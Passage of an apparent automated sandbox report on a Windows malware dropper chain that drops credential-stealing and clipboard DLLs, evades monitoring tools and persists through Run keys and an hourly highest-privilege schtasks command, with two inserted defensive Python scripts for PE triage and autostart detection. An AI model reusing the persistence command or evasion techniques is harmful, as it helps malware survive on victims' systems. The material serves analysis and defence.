Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
Source: UeW2b6mU6Z.exe Static file information: File size 3102720 > 1048576
Source: UeW2b6mU6Z.exe Static PE information: Raw size of ldcfgzdi is bigger than: 0x100000 < 0x2c3400
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D6A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb< source: powershell.exe, 0000001D.00000002.2649486019.000001CA6D701000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 0000001D.00000002.2649486019.000001CA6D701000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdbC source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D6A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.Core.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Management.pdbpdbent.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D611000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D698000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Unpacked PE file: 0.2.UeW2b6mU6Z.exe.c40000.0.unpack :EW;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 1.2.explorha.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 2.2.explorha.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 6.2.explorha.exe.ad0000.1.unpack :EW;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Unpacked PE file: 12.2.amert.exe.d00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mxcnarui:EW;nxgghrcb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mxcnarui:EW;nxgghrcb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Unpacked PE file: 16.2.chrosha.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mxcnarui:EW;nxgghrcb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mxcnarui:EW;nxgghrcb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Unpacked PE file: 20.2.590971cd60.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 38.2.MPGPH131.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 40.2.MPGPH131.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 46.2.RageMP131.exe.2e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Unpacked PE file: 55.2.590971cd60.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: UeW2b6mU6Z.exe Static PE information: real checksum: 0x2f5a1c should be: 0x2f7366
Source: cred64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: clip64[2].dll.16.dr Static PE information: real checksum: 0x0 should be: 0x2272f
Source: amert.exe.6.dr Static PE information: real checksum: 0x1dc6c6 should be: 0x1dbe20
Source: clip64.dll.16.dr Static PE information: real checksum: 0x0 should be: 0x2272f
Source: chrosha.exe.12.dr Static PE information: real checksum: 0x1dc6c6 should be: 0x1dbe20
Source: explorha.exe.0.dr Static PE information: real checksum: 0x2f5a1c should be: 0x2f7366
Source: clip64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: cred64[1].dll.16.dr Static PE information: real checksum: 0x0 should be: 0x14356f
Source: amert[1].exe.6.dr Static PE information: real checksum: 0x1dc6c6 should be: 0x1dbe20
Source: clip64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: cred64.dll.16.dr Static PE information: real checksum: 0x0 should be: 0x14356f
Source: cred64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: UeW2b6mU6Z.exe Static PE information: section name:
Source: UeW2b6mU6Z.exe Static PE information: section name: .idata
Source: UeW2b6mU6Z.exe Static PE information: section name: ldcfgzdi
Source: UeW2b6mU6Z.exe Static PE information: section name: thopgwrw
Source: UeW2b6mU6Z.exe Static PE information: section name: .taggant
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name: ldcfgzdi
Source: explorha.exe.0.dr Static PE information: section name: thopgwrw
Source: explorha.exe.0.dr Static PE information: section name: .taggant
Source: cred64[1].dll.6.dr Static PE information: section name: _RDATA
Source: cred64.dll.6.dr Static PE information: section name: _RDATA
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: mxcnarui
Source: amert[1].exe.6.dr Static PE information: section name: nxgghrcb
Source: amert[1].exe.6.dr Static PE information: section name: .taggant
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: mxcnarui
Source: amert.exe.6.dr Static PE information: section name: nxgghrcb
Source: amert.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: kiragzej
Source: random[1].exe0.6.dr Static PE information: section name: cquspnza
Source: 590971cd60.exe.6.dr Static PE information: section name:
Source: 590971cd60.exe.6.dr Static PE information: section name: .idata
Source: 590971cd60.exe.6.dr Static PE information: section name:
Source: 590971cd60.exe.6.dr Static PE information: section name: kiragzej
Source: 590971cd60.exe.6.dr Static PE information: section name: cquspnza
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: dspczsrr
Source: sarra[1].exe.6.dr Static PE information: section name: bhvulryj
Source: chrosha.exe.12.dr Static PE information: section name:
Source: chrosha.exe.12.dr Static PE information: section name: .idata
Source: chrosha.exe.12.dr Static PE information: section name:
Source: chrosha.exe.12.dr Static PE information: section name: mxcnarui
Source: chrosha.exe.12.dr Static PE information: section name: nxgghrcb
Source: chrosha.exe.12.dr Static PE information: section name: .taggant
Source: cred64[1].dll.16.dr Static PE information: section name: _RDATA
Source: cred64.dll.16.dr Static PE information: section name: _RDATA
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: .idata
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: kiragzej
Source: RageMP131.exe.20.dr Static PE information: section name: cquspnza
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: .idata
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: kiragzej
Source: MPGPH131.exe.20.dr Static PE information: section name: cquspnza
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C529A0 push esp; ret 0_2_00C529A1
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C49420 push ebx; ret 0_2_00C4942A
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C48DE6 push esi; iretd 0_2_00C48DE7
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C5EFBC push ecx; ret 0_2_00C5EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00ADC0E8 push cs; retn 0002h 1_2_00ADC0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00AD9420 push ebx; ret 1_2_00AD942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00AD8DE6 push esi; iretd 1_2_00AD8DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00AEEFBC push ecx; ret 1_2_00AEEFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00ADC0E8 push cs; retn 0002h 2_2_00ADC0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00AD9420 push ebx; ret 2_2_00AD942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00AD8DE6 push esi; iretd 2_2_00AD8DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00AEEFBC push ecx; ret 2_2_00AEEFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AEEFBC push ecx; ret 6_2_00AEEFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B0F4FB push ss; iretd 6_2_00B0F4FC
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AEF666 push ecx; ret 6_2_00AEF679
Source: UeW2b6mU6Z.exe Static PE information: section name: entropy: 7.980021515405835
Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.980021515405835
Source: amert[1].exe.6.dr Static PE information: section name: entropy: 7.988756925012516
Source: amert[1].exe.6.dr Static PE information: section name: mxcnarui entropy: 7.954740123468286
Source: amert.exe.6.dr Static PE information: section name: entropy: 7.988756925012516
Source: amert.exe.6.dr Static PE information: section name: mxcnarui entropy: 7.954740123468286
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.9277038793201395
Source: random[1].exe0.6.dr Static PE information: section name: kiragzej entropy: 7.949158381661359
Source: 590971cd60.exe.6.dr Static PE information: section name: entropy: 7.9277038793201395
Source: 590971cd60.exe.6.dr Static PE information: section name: kiragzej entropy: 7.949158381661359
Source: sarra[1].exe.6.dr Static PE information: section name: entropy: 7.927724377474478
Source: sarra[1].exe.6.dr Static PE information: section name: dspczsrr entropy: 7.949274848387835
Source: chrosha.exe.12.dr Static PE information: section name: entropy: 7.988756925012516
Source: chrosha.exe.12.dr Static PE information: section name: mxcnarui entropy: 7.954740123468286
Source: RageMP131.exe.20.dr Static PE information: section name: entropy: 7.9277038793201395
Source: RageMP131.exe.20.dr Static PE information: section name: kiragzej entropy: 7.949158381661359
Source: MPGPH131.exe.20.dr Static PE information: section name: entropy: 7.9277038793201395
Source: MPGPH131.exe.20.dr Static PE information: section name: kiragzej entropy: 7.949158381661359
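The section-name, entropy and checksum lines above, and the section-rights comparison at the start of this section, all come from static parsing of the PE headers. The following Python is an added example and is not part of the Joe Sandbox report or of the sample: it builds a constructed PE32 image whose layout mimics the pattern the report shows (a blank/non-printable section name holding a high-entropy payload, a randomly named second section, a resource section) and then reproduces each check: section names with non-printable names flagged, rights in the report's E/R/W letter notation (R included), Shannon entropy per section, the imagehlp CheckSum algorithm behind "real checksum X should be Y", and a file-versus-dump rights comparison behind "Detected unpacking (changes PE section rights)". The section names, payload bytes, header field values and the 7.5-bit entropy threshold in the usage note are assumptions for the illustration.

```python
"""Static PE triage behind the report's section-name, rights, entropy and checksum lines (constructed image)."""
import hashlib
import math
import struct

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000  # IMAGE_SCN_MEM_* bits
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes
CHECKSUM_OFF = 64             # CheckSum offset inside the optional header (PE32 and PE32+)


def rights(chars):
    """Section rights in the report's letter notation, e.g. 'ER' on disk vs 'ERW' after unpacking."""
    return "".join(letter for bit, letter in ((SCN_EXECUTE, "E"), (SCN_READ, "R"), (SCN_WRITE, "W")) if chars & bit)

def shannon_entropy(data):
    """Bits per byte; values near 8.0 mean compressed or encrypted (packed) content."""
    if not data:
        return 0.0
    counts = [0] * 256
    for byte in data:
        counts[byte] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)

def pe_checksum(image):
    """imagehlp CheckSum: one's-complement sum of 16-bit words over the whole file, skipping the
    CheckSum field itself, folded to 16 bits, plus the file length."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    skip = (e_lfanew + 24 + CHECKSUM_OFF) // 2      # word index of the field (e_lfanew is even)
    total = 0
    for idx, (word,) in enumerate(struct.iter_unpack("<H", bytes(image) + b"\x00" * (len(image) % 2))):
        if idx not in (skip, skip + 1):
            total = ((total + word) & 0xFFFF) + ((total + word) >> 16)
    return total + len(image)

def parse_sections(image):
    """Section table as the report prints it: name (blank/non-printable names flagged), rights, entropy."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[:2] != b"MZ" or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    count = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    table = e_lfanew + 24 + struct.unpack_from("<H", image, e_lfanew + 20)[0]
    sections = []
    for i in range(count):
        raw_name, _, _, raw_size, raw_ptr, *_, chars = struct.unpack_from(SECTION_FMT, image, table + 40 * i)
        name = raw_name.rstrip(b"\x00")
        printable = bool(name) and all(0x20 < c < 0x7F for c in name)
        sections.append({"name": name.decode("ascii") if printable else repr(name),
                         "printable_name": printable, "rights": rights(chars),
                         "entropy": round(shannon_entropy(image[raw_ptr:raw_ptr + raw_size]), 3)})
    return sections

def checksum_status(image):
    """(stored, computed): the pair behind 'real checksum 0x0 should be 0x147ee8'."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return struct.unpack_from("<I", image, e_lfanew + 24 + CHECKSUM_OFF)[0], pe_checksum(image)

def changed_rights(on_disk, dumped):
    """Sections whose rights differ between file and dump: 'Detected unpacking (changes PE section rights)'."""
    return [(a["name"], a["rights"], b["rights"]) for a, b in zip(parse_sections(on_disk), parse_sections(dumped))
            if a["rights"] != b["rights"]]

def build_sample_pe(sections, checksum=0):
    """Constructed PE32 image; only the header fields the functions above read are populated."""
    file_align, sect_align, e_lfanew = 0x200, 0x1000, 0x40
    hdr_size = e_lfanew + 24 + 224 + 40 * len(sections)
    hdr_size += -hdr_size % file_align
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)  # i386, EXECUTABLE|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<II", opt, 32, sect_align, file_align)
    struct.pack_into("<II", opt, 60, hdr_size, checksum)       # SizeOfHeaders, CheckSum
    table, raw, ptr, va = b"", b"", hdr_size, sect_align
    for name, data, chars in sections:
        data += b"\x00" * (-len(data) % file_align)
        table += struct.pack(SECTION_FMT, name, len(data), va, len(data), ptr, 0, 0, 0, 0, chars)
        raw, ptr, va = raw + data, ptr + len(data), va + len(data) + (-len(data) % sect_align)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return header + b"\x00" * (hdr_size - len(header)) + raw


CODE = SCN_EXECUTE | SCN_READ
PACKED = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))  # 4 KiB, ~7.95 bits/byte
SAMPLE_SECTIONS = [                       # constructed; names follow the report's pattern
    (b"\x01\x02", PACKED, CODE),          # 'blank' section name holding the packed payload
    (b"kiragzej", PACKED[::-1], CODE | SCN_WRITE),
    (b".rsrc", b"\x00" * 600 + b"VS_VERSION_INFO", SCN_READ),
]
ON_DISK = build_sample_pe(SAMPLE_SECTIONS)
DUMPED = build_sample_pe([(b"\x01\x02", PACKED, CODE | SCN_WRITE)] + SAMPLE_SECTIONS[1:])  # packer made it writable

if __name__ == "__main__":
    for s in parse_sections(ON_DISK):
        print(f"section name: {s['name']:>12}  rights: {s['rights']:<3}  entropy: {s['entropy']}")
    print("real checksum: {:#x} should be: {:#x}".format(*checksum_status(ON_DISK)))
    print("section rights changed in dump:", changed_rights(ON_DISK, DUMPED))
```

Run as a script it prints report-style lines for the constructed image; to triage a dropped file, pass the bytes of `open(path, "rb").read()` to parse_sections and checksum_status (the pure-Python word loop takes a second or two on a multi-megabyte file). A stored checksum of 0 is not malicious on its own, since linkers leave the field unset unless asked to fill it; the signal in the report is the combination with entropy above roughly 7.5 bits per byte in sections whose names are blank or random and a header checksum that does not match. changed_rights assumes the dump has been re-laid to file offsets; for a raw memory dump the section table has to be read through virtual addresses instead.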
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\sarra[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bad48ea9ac.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 590971cd60.exe Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
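The Boot Survival entries above record three HKEY_CURRENT_USER Run values, an hourly schtasks /create task and a legacy .job file. The following Python is an added example and is not part of the Joe Sandbox report: it applies the folder-based test behind the "New RUN Key Pointing to Suspicious Folder" signature to constructed autostart records. The schtasks command line is the one recorded above; the Run-value data is assumed (the report lists only value names, so each is taken to point at the path where the report saw that file dropped), as are the environment-variable expansions for the "user" profile, the suspicious-folder and allowlist patterns, and the two benign control entries.

```python
"""Flag autostart entries whose target lives in a temporary or user-writable folder (constructed records)."""
import re

# Folders a legitimate autostart rarely points into. An assumption for this example, not the exact
# list of any published Sigma rule; tune it to the estate being hunted.
SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\appdata\\roaming\\",
    "\\appdata\\local\\", "\\programdata\\", "\\users\\public\\",
)
# Vendor location that would otherwise trip the \appdata\local\ pattern (assumed allowlist).
ALLOWLIST_PREFIXES = ("\\appdata\\local\\microsoft\\",)
# Expansions for the analysed profile; the report's paths show the account name 'user' (assumed).
ENV_VARS = {
    "%temp%": "c:\\users\\user\\appdata\\local\\temp", "%tmp%": "c:\\users\\user\\appdata\\local\\temp",
    "%appdata%": "c:\\users\\user\\appdata\\roaming", "%localappdata%": "c:\\users\\user\\appdata\\local",
    "%programdata%": "c:\\programdata", "%windir%": "c:\\windows",
}


def target_path(command):
    """Executable behind a Run value or task action: a quoted path, else the first token.
    LOLBin wrappers (rundll32 x.dll,Entry; powershell -Command ...) need their inner argument parsed instead."""
    m = re.match(r'\s*"([^"]+)"', command)
    if m:
        return m.group(1)
    tokens = command.split()
    return tokens[0] if tokens else ""

def normalize(path):
    """Lower-case, backslash-only, environment variables expanded."""
    p = path.strip().lower().replace("/", "\\")
    for var, value in ENV_VARS.items():
        p = p.replace(var, value)
    return p

def schtasks_target(cmdline):
    """The /tr (task action) argument of a 'schtasks /create' command line, or None."""
    m = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)

def classify(entries):
    """entries: (mechanism, name, command). Returns (mechanism, name, normalized_path, matched_folder)
    for every entry whose target resolves into a suspicious folder and is not allowlisted."""
    hits = []
    for mechanism, name, command in entries:
        path = normalize(target_path(command))
        if any(prefix in path for prefix in ALLOWLIST_PREFIXES):
            continue
        for folder in SUSPICIOUS_DIRS:
            if folder in path:
                hits.append((mechanism, name, path, folder))
                break
    return hits


# schtasks command line as recorded in the report; Run-value data constructed to point at the
# paths where the report saw those files dropped (the report itself lists only value names).
SCHTASKS_CMDLINE = ('schtasks /create /f /RU "user" /tr "C:\\ProgramData\\MPGPH131\\MPGPH131.exe" '
                    '/tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST')
SAMPLE_ENTRIES = [
    ("HKCU Run", "bad48ea9ac.exe", "C:\\Users\\user\\AppData\\Local\\Temp\\1000055001\\bad48ea9ac.exe"),
    ("HKCU Run", "590971cd60.exe", "C:\\Users\\user\\AppData\\Local\\Temp\\1000056001\\590971cd60.exe"),
    ("HKCU Run", "RageMP131", '"C:\\Users\\user\\AppData\\Local\\RageMP131\\RageMP131.exe"'),
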